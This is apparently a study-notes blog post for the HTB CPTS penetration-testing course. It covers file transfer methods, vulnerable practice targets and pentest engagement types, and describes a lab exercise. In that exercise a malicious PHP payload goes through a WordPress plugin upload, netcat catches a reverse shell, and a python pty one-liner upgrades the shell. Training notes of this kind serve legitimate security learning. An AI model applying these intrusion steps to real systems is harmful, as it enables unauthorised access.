HTB CPTS: Study session (Transferring files, Knowledge sources, Vulnerable Machines and apps, Reverse shell)
Transferring files
- During any penetration testing exercise, it is likely that we will need to transfer files to the remote server.
There are few options for this:
One method is running a Python HTTP server on our machine and then using
wgetorcURLto download the file on the remote host.Another method to transfer files would be using
scpWhen there are firewall protection we can use Base64 encoding/decoding
To validate that the transfer was successful, we can check the hash value on the target machine and on our machine with
md5sum <file>.
Vulnerable Machines and Applications
Here’s a list of vulnerable machines/apps that are safe to train on:
| OWASP Juice Shop | Is a modern vulnerable web application written in Node.js, Express, and Angular which showcases the entire OWASP Top Ten along with many other real-world application security flaws. |
| Metasploitable 2 | Is a purposefully vulnerable Ubuntu Linux VM that can be used to practice enumeration, automated, and manual exploitation. |
| Metasploitable 3 | Is a template for building a vulnerable Windows VM configured with a wide range of vulnerabilities. |
| DVWA | This is a vulnerable PHP/MySQL web application showcasing many common web application vulnerabilities with varying degrees of difficulty. |
Blog
Good blog to visit from time to time is - https://0xdf.gitlab.io/
Websites to train Windows Powershell and Linux Terminal
Worth checking - Under The Wire and Over The Wire. You can also train Bash and Powershell scripts here.
Types of Pentesting
There are 3 main types of pentesting
| Engagement | Description |
Black-Box | Low level to no knowledge of a target. The penetration tester must perform in-depth reconnaissance to learn about the target. This may be an external penetration test where the tester is given only the company name and no further information such as target IP addresses, or an internal penetration test where the tester either has to bypass controls to gain initial access to the network or can connect to the internal network but has no information about internal networks/hosts. This type of penetration test most simulates an actual attack but is not as comprehensive as other assessment types and could leave misconfigurations/vulnerabilities undiscovered. |
Grey-Box | In a grey-box test, the tester is given a certain amount of information in advance. This may be a list of in-scope IP addresses/ranges, low-level credentials to a web application or Active Directory, or some application/network diagrams. This type of penetration test can simulate a malicious insider or see what an attacker can do with a low level of access. In this scenario, the tester will typically spend less time on reconnaissance and more time looking for misconfigurations and attempting exploitation. |
White-Box | In this type of test, the tester is given complete access. In a web application test, they may be provided with administrator-level credentials, access to the source code, build diagrams, etc., to look for logic vulnerabilities and other difficult-to-discover flaws. In a network test, they may be given administrator-level credentials to dig into Active Directory or other systems for misconfigurations that may otherwise be missed. This assessment type is highly comprehensive as the tester will have access to both sides of a target and perform a comprehensive analysis. |
- It is essential to get in the habit of taking extensive notes and saving all console output early on. The better we get at this while practicing, the more second nature it will become when on real-world engagements. Proper notetaking is critical for us as penetration testers and will significantly speed up the reporting process and ensure no evidence is lost.
Reverse shell cheat sheets
Thoughts after practical exercises
Process of gathering flag by the user and root was really cool. I saw the importance of OSINT. I’ve found the password to the admin user of the wordpress dashboard. All of the process looked something like this:
OSINT
System enumeration to find sub-urls and users.
Login to admin account
Check plugins which are used for the site
Find an exploit which would work with one of the plugins
Create malicious PHP payload.
Import PHP payload to the vulnerable MyImages plugin. It does not care if you upload a jpg, pdf or php.
With malicious code uploaded we can open reverse shell while listening on
netcatWe’re in, but it is not comfortable to use plain web terminal, so we shall “summon” bash with python.
Locate what version of python is being used
Spawn the bash with
python3 -c 'import pty; pty.spawn("/bin/bash")'You’re in.
OUTRO
Let’s learn more tools. Follow my blog for more.
Try to learn one new thing everyday.
